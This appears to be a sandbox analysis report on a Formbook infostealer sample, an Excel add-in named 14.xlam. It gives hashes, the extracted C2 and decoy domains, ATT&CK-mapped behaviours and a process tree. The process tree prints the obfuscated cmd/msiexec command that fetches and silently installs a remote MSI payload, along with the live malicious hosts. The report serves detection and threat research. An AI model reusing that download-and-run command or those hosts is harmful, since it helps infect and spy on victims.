formbook | cfee90218720f31491495dd353027017808fb3b9524d6c86ddfd016a372f627c

General

Target

14.xlam
Size

15KB
MD5

11e9376ee19889ee5c08e816b1d3b231
SHA1

d22b56bedc58de7da73d647a5f3048b9cabc17d7
SHA256

cfee90218720f31491495dd353027017808fb3b9524d6c86ddfd016a372f627c
SHA512

fe846e63b1616166bebed98bdea82f1d141a23a0abc68cf6dc94216f9b0242859dcebd5471aa0943a46a5ecfca1e430badaf049db4469ec3a13a252b2eb8164b

Score

10^/10

formbook rat spyware stealer trojan

Malware Config

Extracted

Family

formbook

Version

4.1

C2

http://www.111bjs.com/ccr/

Decoy

abdullahlodhi.com

jevya.com

knoxvillerestaurant.com

mekarauroko7389.com

cricketspowder.net

johannchirinos.com

orangeorganical.com

libero-tt.com

lorenaegianluca.com

wintab.net

modernmillievintage.com

zgdqcyw.com

jeffabildgaardmd.com

nurulfikrimakassar.com

findyourchef.com

innovationsservicegroup.com

destek-taleplerimiz.com

whfqqco.icu

kosmetikmadeingermany.com

dieteticos.net

Signatures

Formbook
Formbook is a data stealing malware which is capable of stealing data.
trojan spyware stealer formbook

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2656	4084	cmd.exe	EXCEL.EXE

Formbook Payload 3 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/4128-188-0x0000000000400000-0x000000000042E000-memory.dmp	formbook
behavioral2/memory/4128-190-0x0000000000560000-0x00000000006AA000-memory.dmp	formbook
behavioral2/memory/4216-198-0x00000000030E0000-0x000000000310E000-memory.dmp	formbook

Blocklisted process makes network request 1 IoCs

Processes:

msiexec.exe

flow pid process

16 2608 msiexec.exe
Executes dropped EXE 2 IoCs

Processes:

MSI47A1.tmpMSI47A1.tmp

pid process

2228 MSI47A1.tmp
4128 MSI47A1.tmp
Loads dropped DLL 1 IoCs

Processes:

MSI47A1.tmp

pid process

2228 MSI47A1.tmp
Use of msiexec (install) with remote resource 1 IoCs

Processes:

msiexec.exe

pid process

2440 msiexec.exe

flow	pid	process
16	2608	msiexec.exe

pid	process
2228	MSI47A1.tmp
4128	MSI47A1.tmp

pid	process
2228	MSI47A1.tmp

pid	process
2440	msiexec.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exe

description	ioc	process
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

MSI47A1.tmpMSI47A1.tmpipconfig.exe

description	pid	process	target process
PID 2228 set thread context of 4128	2228	MSI47A1.tmp	MSI47A1.tmp
PID 4128 set thread context of 3008	4128	MSI47A1.tmp	Explorer.EXE
PID 4128 set thread context of 3008	4128	MSI47A1.tmp	Explorer.EXE
PID 4216 set thread context of 3008	4216	ipconfig.exe	Explorer.EXE

Drops file in Windows directory 6 IoCs

Processes:

msiexec.exe

description	ioc	process
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4676.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI47A1.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI424E.tmp	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

NSIS installer 6 IoCs

installer

Processes:

resource	yara_rule
C:\Windows\Installer\MSI47A1.tmp	nsis_installer_1
C:\Windows\Installer\MSI47A1.tmp	nsis_installer_2
C:\Windows\Installer\MSI47A1.tmp	nsis_installer_1
C:\Windows\Installer\MSI47A1.tmp	nsis_installer_2
C:\Windows\Installer\MSI47A1.tmp	nsis_installer_1
C:\Windows\Installer\MSI47A1.tmp	nsis_installer_2

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

ipconfig.exe

pid process

4216 ipconfig.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

4084 EXCEL.EXE

pid	process
4216	ipconfig.exe

pid	process
4084	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 58 IoCs

Processes:

msiexec.exeMSI47A1.tmpipconfig.exe

pid	process
2608	msiexec.exe
2608	msiexec.exe
4128	MSI47A1.tmp
4128	MSI47A1.tmp
4128	MSI47A1.tmp
4128	MSI47A1.tmp
4128	MSI47A1.tmp
4128	MSI47A1.tmp
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe
4216	ipconfig.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3008 Explorer.EXE
Suspicious behavior: MapViewOfSection 7 IoCs

Processes:

MSI47A1.tmpMSI47A1.tmpipconfig.exe

pid process

2228 MSI47A1.tmp
4128 MSI47A1.tmp
4128 MSI47A1.tmp
4128 MSI47A1.tmp
4128 MSI47A1.tmp
4216 ipconfig.exe
4216 ipconfig.exe

pid	process
3008	Explorer.EXE

pid	process
2228	MSI47A1.tmp
4128	MSI47A1.tmp
4128	MSI47A1.tmp
4128	MSI47A1.tmp
4128	MSI47A1.tmp
4216	ipconfig.exe
4216	ipconfig.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

msiexec.exemsiexec.exeMSI47A1.tmpipconfig.exeExplorer.EXE

description	pid	process
Token: SeShutdownPrivilege	2440	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2440	msiexec.exe
Token: SeSecurityPrivilege	2608	msiexec.exe
Token: SeCreateTokenPrivilege	2440	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2440	msiexec.exe
Token: SeLockMemoryPrivilege	2440	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2440	msiexec.exe
Token: SeMachineAccountPrivilege	2440	msiexec.exe
Token: SeTcbPrivilege	2440	msiexec.exe
Token: SeSecurityPrivilege	2440	msiexec.exe
Token: SeTakeOwnershipPrivilege	2440	msiexec.exe
Token: SeLoadDriverPrivilege	2440	msiexec.exe
Token: SeSystemProfilePrivilege	2440	msiexec.exe
Token: SeSystemtimePrivilege	2440	msiexec.exe
Token: SeProfSingleProcessPrivilege	2440	msiexec.exe
Token: SeIncBasePriorityPrivilege	2440	msiexec.exe
Token: SeCreatePagefilePrivilege	2440	msiexec.exe
Token: SeCreatePermanentPrivilege	2440	msiexec.exe
Token: SeBackupPrivilege	2440	msiexec.exe
Token: SeRestorePrivilege	2440	msiexec.exe
Token: SeShutdownPrivilege	2440	msiexec.exe
Token: SeDebugPrivilege	2440	msiexec.exe
Token: SeAuditPrivilege	2440	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2440	msiexec.exe
Token: SeChangeNotifyPrivilege	2440	msiexec.exe
Token: SeRemoteShutdownPrivilege	2440	msiexec.exe
Token: SeUndockPrivilege	2440	msiexec.exe
Token: SeSyncAgentPrivilege	2440	msiexec.exe
Token: SeEnableDelegationPrivilege	2440	msiexec.exe
Token: SeManageVolumePrivilege	2440	msiexec.exe
Token: SeImpersonatePrivilege	2440	msiexec.exe
Token: SeCreateGlobalPrivilege	2440	msiexec.exe
Token: SeRestorePrivilege	2608	msiexec.exe
Token: SeTakeOwnershipPrivilege	2608	msiexec.exe
Token: SeRestorePrivilege	2608	msiexec.exe
Token: SeTakeOwnershipPrivilege	2608	msiexec.exe
Token: SeRestorePrivilege	2608	msiexec.exe
Token: SeTakeOwnershipPrivilege	2608	msiexec.exe
Token: SeRestorePrivilege	2608	msiexec.exe
Token: SeTakeOwnershipPrivilege	2608	msiexec.exe
Token: SeRestorePrivilege	2608	msiexec.exe
Token: SeTakeOwnershipPrivilege	2608	msiexec.exe
Token: SeRestorePrivilege	2608	msiexec.exe
Token: SeTakeOwnershipPrivilege	2608	msiexec.exe
Token: SeDebugPrivilege	4128	MSI47A1.tmp
Token: SeDebugPrivilege	4216	ipconfig.exe
Token: SeShutdownPrivilege	3008	Explorer.EXE
Token: SeCreatePagefilePrivilege	3008	Explorer.EXE
Token: SeShutdownPrivilege	3008	Explorer.EXE
Token: SeCreatePagefilePrivilege	3008	Explorer.EXE
Token: SeShutdownPrivilege	3008	Explorer.EXE
Token: SeCreatePagefilePrivilege	3008	Explorer.EXE
Token: SeShutdownPrivilege	3008	Explorer.EXE
Token: SeCreatePagefilePrivilege	3008	Explorer.EXE
Token: SeShutdownPrivilege	3008	Explorer.EXE
Token: SeCreatePagefilePrivilege	3008	Explorer.EXE
Token: SeShutdownPrivilege	3008	Explorer.EXE
Token: SeCreatePagefilePrivilege	3008	Explorer.EXE
Token: SeShutdownPrivilege	3008	Explorer.EXE
Token: SeCreatePagefilePrivilege	3008	Explorer.EXE
Token: SeShutdownPrivilege	3008	Explorer.EXE
Token: SeCreatePagefilePrivilege	3008	Explorer.EXE
Token: SeShutdownPrivilege	3008	Explorer.EXE
Token: SeCreatePagefilePrivilege	3008	Explorer.EXE

Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

EXCEL.EXE

pid process

4084 EXCEL.EXE
4084 EXCEL.EXE
4084 EXCEL.EXE
4084 EXCEL.EXE
4084 EXCEL.EXE
4084 EXCEL.EXE
4084 EXCEL.EXE
4084 EXCEL.EXE
Suspicious use of UnmapMainImage 1 IoCs

Processes:

Explorer.EXE

pid process

3008 Explorer.EXE

pid	process
4084	EXCEL.EXE
4084	EXCEL.EXE
4084	EXCEL.EXE
4084	EXCEL.EXE
4084	EXCEL.EXE
4084	EXCEL.EXE
4084	EXCEL.EXE
4084	EXCEL.EXE

pid	process
3008	Explorer.EXE

Suspicious use of WriteProcessMemory 17 IoCs

Processes:

EXCEL.EXEcmd.exemsiexec.exeMSI47A1.tmpExplorer.EXEipconfig.exe

description	pid	process	target process
PID 4084 wrote to memory of 2656	4084	EXCEL.EXE	cmd.exe
PID 4084 wrote to memory of 2656	4084	EXCEL.EXE	cmd.exe
PID 2656 wrote to memory of 2440	2656	cmd.exe	msiexec.exe
PID 2656 wrote to memory of 2440	2656	cmd.exe	msiexec.exe
PID 2608 wrote to memory of 2228	2608	msiexec.exe	MSI47A1.tmp
PID 2608 wrote to memory of 2228	2608	msiexec.exe	MSI47A1.tmp
PID 2608 wrote to memory of 2228	2608	msiexec.exe	MSI47A1.tmp
PID 2228 wrote to memory of 4128	2228	MSI47A1.tmp	MSI47A1.tmp
PID 2228 wrote to memory of 4128	2228	MSI47A1.tmp	MSI47A1.tmp
PID 2228 wrote to memory of 4128	2228	MSI47A1.tmp	MSI47A1.tmp
PID 2228 wrote to memory of 4128	2228	MSI47A1.tmp	MSI47A1.tmp
PID 3008 wrote to memory of 4216	3008	Explorer.EXE	ipconfig.exe
PID 3008 wrote to memory of 4216	3008	Explorer.EXE	ipconfig.exe
PID 3008 wrote to memory of 4216	3008	Explorer.EXE	ipconfig.exe
PID 4216 wrote to memory of 4260	4216	ipconfig.exe	cmd.exe
PID 4216 wrote to memory of 4260	4216	ipconfig.exe	cmd.exe
PID 4216 wrote to memory of 4260	4216	ipconfig.exe	cmd.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:3008

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\14.xlam"
2⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4084

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C m^SiE^x^e^c /i http://farm-finn.com/admin/4409212.msi /qn
3⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2656

C:\Windows\system32\msiexec.exe
mSiExec /i http://farm-finn.com/admin/4409212.msi /qn
4⤵
- Use of msiexec (install) with remote resource
- Suspicious use of AdjustPrivilegeToken
PID:2440

C:\Windows\SysWOW64\ipconfig.exe
"C:\Windows\SysWOW64\ipconfig.exe"
2⤵
- Suspicious use of SetThreadContext
- Gathers network information
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4216

C:\Windows\SysWOW64\cmd.exe
/c del "C:\Windows\Installer\MSI47A1.tmp"
3⤵
PID:4260

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2608

C:\Windows\Installer\MSI47A1.tmp
"C:\Windows\Installer\MSI47A1.tmp"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2228

C:\Windows\Installer\MSI47A1.tmp
"C:\Windows\Installer\MSI47A1.tmp"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:4128

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

1

T1059

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

3

T1012

Peripheral Device Discovery

1

T1120

System Information Discovery

5

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
MD5
4fcb2a3ee025e4a10d21e1b154873fe2

SHA1
57658e2fa594b7d0b99d02e041d0f3418e58856b

SHA256
90bf6baa6f968a285f88620fbf91e1f5aa3e66e2bad50fd16f37913280ad8228

SHA512
4e85d48db8c0ee5c4dd4149ab01d33e4224456c3f3e3b0101544a5ca87a0d74b3ccd8c0509650008e2abed65efd1e140b1e65ae5215ab32de6f6a49c9d3ec3ff

Download Submit
C:\Windows\Installer\MSI47A1.tmp
MD5
d8a19f13154e81e9d526077422655453

SHA1
573e6aed1534203b36f9a8e5121c125b02e11b0f

SHA256
b525832c63ea5d05a8afde822fcb39e5fb759497e7c2c986a5673fec721ed853

SHA512
193344e672c7fb66fbd6acc2608c1d9acf360091ddf8086e5609e5a8ed511e1117fc2b7eb7cb43b56e984bf9f98f6a7648f8f1b0defc1416b2dca3c557ae39ae

Download Submit
C:\Windows\Installer\MSI47A1.tmp
MD5
d8a19f13154e81e9d526077422655453

SHA1
573e6aed1534203b36f9a8e5121c125b02e11b0f

SHA256
b525832c63ea5d05a8afde822fcb39e5fb759497e7c2c986a5673fec721ed853

SHA512
193344e672c7fb66fbd6acc2608c1d9acf360091ddf8086e5609e5a8ed511e1117fc2b7eb7cb43b56e984bf9f98f6a7648f8f1b0defc1416b2dca3c557ae39ae

Download Submit
C:\Windows\Installer\MSI47A1.tmp
MD5
d8a19f13154e81e9d526077422655453

SHA1
573e6aed1534203b36f9a8e5121c125b02e11b0f

SHA256
b525832c63ea5d05a8afde822fcb39e5fb759497e7c2c986a5673fec721ed853

SHA512
193344e672c7fb66fbd6acc2608c1d9acf360091ddf8086e5609e5a8ed511e1117fc2b7eb7cb43b56e984bf9f98f6a7648f8f1b0defc1416b2dca3c557ae39ae

Download Submit
\Users\Admin\AppData\Local\Temp\nsq4973.tmp\3dd73lht.dll
MD5
df8beafa8d4250032a73e261c80e35e3

SHA1
3ced0abd9f02d24d79ede5052f661108b01df997

SHA256
a57717b0b91bb128761a4363d12cacd45431c7e512d5a8d307b40cf30e6a26da

SHA512
bf9fd7009e3c4919b2b230748c8f3795423b4e7e57d82d531a31682916dfb589c2df2b20320a51b532e21dec98ce597a4a80589ec5fa442417274661e1c9d1ce

Download Submit
memory/2228-181-0x0000000000000000-mapping.dmp

Download
memory/2228-187-0x00000000027C0000-0x00000000027E3000-memory.dmp

Filesize
140KB

Download
memory/2440-180-0x0000000000000000-mapping.dmp

Download
memory/2656-179-0x0000000000000000-mapping.dmp

Download
memory/3008-191-0x00000000062E0000-0x0000000006487000-memory.dmp

Filesize
1.7MB

Download
memory/3008-193-0x0000000006E00000-0x0000000006F65000-memory.dmp

Filesize
1.4MB

Download
memory/3008-201-0x00000000053A0000-0x00000000054E5000-memory.dmp

Filesize
1.3MB

Download
memory/4084-118-0x00007FFB8DE80000-0x00007FFB8DE90000-memory.dmp

Filesize
64KB

Download
memory/4084-117-0x00007FFB8DE80000-0x00007FFB8DE90000-memory.dmp

Filesize
64KB

Download
memory/4084-114-0x00007FF7F5450000-0x00007FF7F8A06000-memory.dmp

Filesize
53.7MB

Download
memory/4084-116-0x00007FFB8DE80000-0x00007FFB8DE90000-memory.dmp

Filesize
64KB

Download
memory/4084-122-0x00007FFB8DE80000-0x00007FFB8DE90000-memory.dmp

Filesize
64KB

Download
memory/4084-121-0x00007FFBAEA40000-0x00007FFBAFB2E000-memory.dmp

Filesize
16.9MB

Download
memory/4084-115-0x00007FFB8DE80000-0x00007FFB8DE90000-memory.dmp

Filesize
64KB

Download
memory/4084-123-0x00000275804B0000-0x00000275823A5000-memory.dmp

Filesize
31.0MB

Download
memory/4128-185-0x000000000041EBB0-mapping.dmp

Download
memory/4128-192-0x0000000000930000-0x0000000000944000-memory.dmp

Filesize
80KB

Download
memory/4128-190-0x0000000000560000-0x00000000006AA000-memory.dmp

Filesize
1.3MB

Download
memory/4128-189-0x0000000000A40000-0x0000000000D60000-memory.dmp

Filesize
3.1MB

Download
memory/4128-188-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/4216-195-0x0000000000000000-mapping.dmp

Download
memory/4216-198-0x00000000030E0000-0x000000000310E000-memory.dmp

Filesize
184KB

Download
memory/4216-197-0x00000000010D0000-0x00000000010DB000-memory.dmp

Filesize
44KB

Download
memory/4216-199-0x00000000032B0000-0x00000000035D0000-memory.dmp

Filesize
3.1MB

Download
memory/4216-200-0x0000000003670000-0x0000000003703000-memory.dmp

Filesize
588KB

Download
memory/4260-196-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads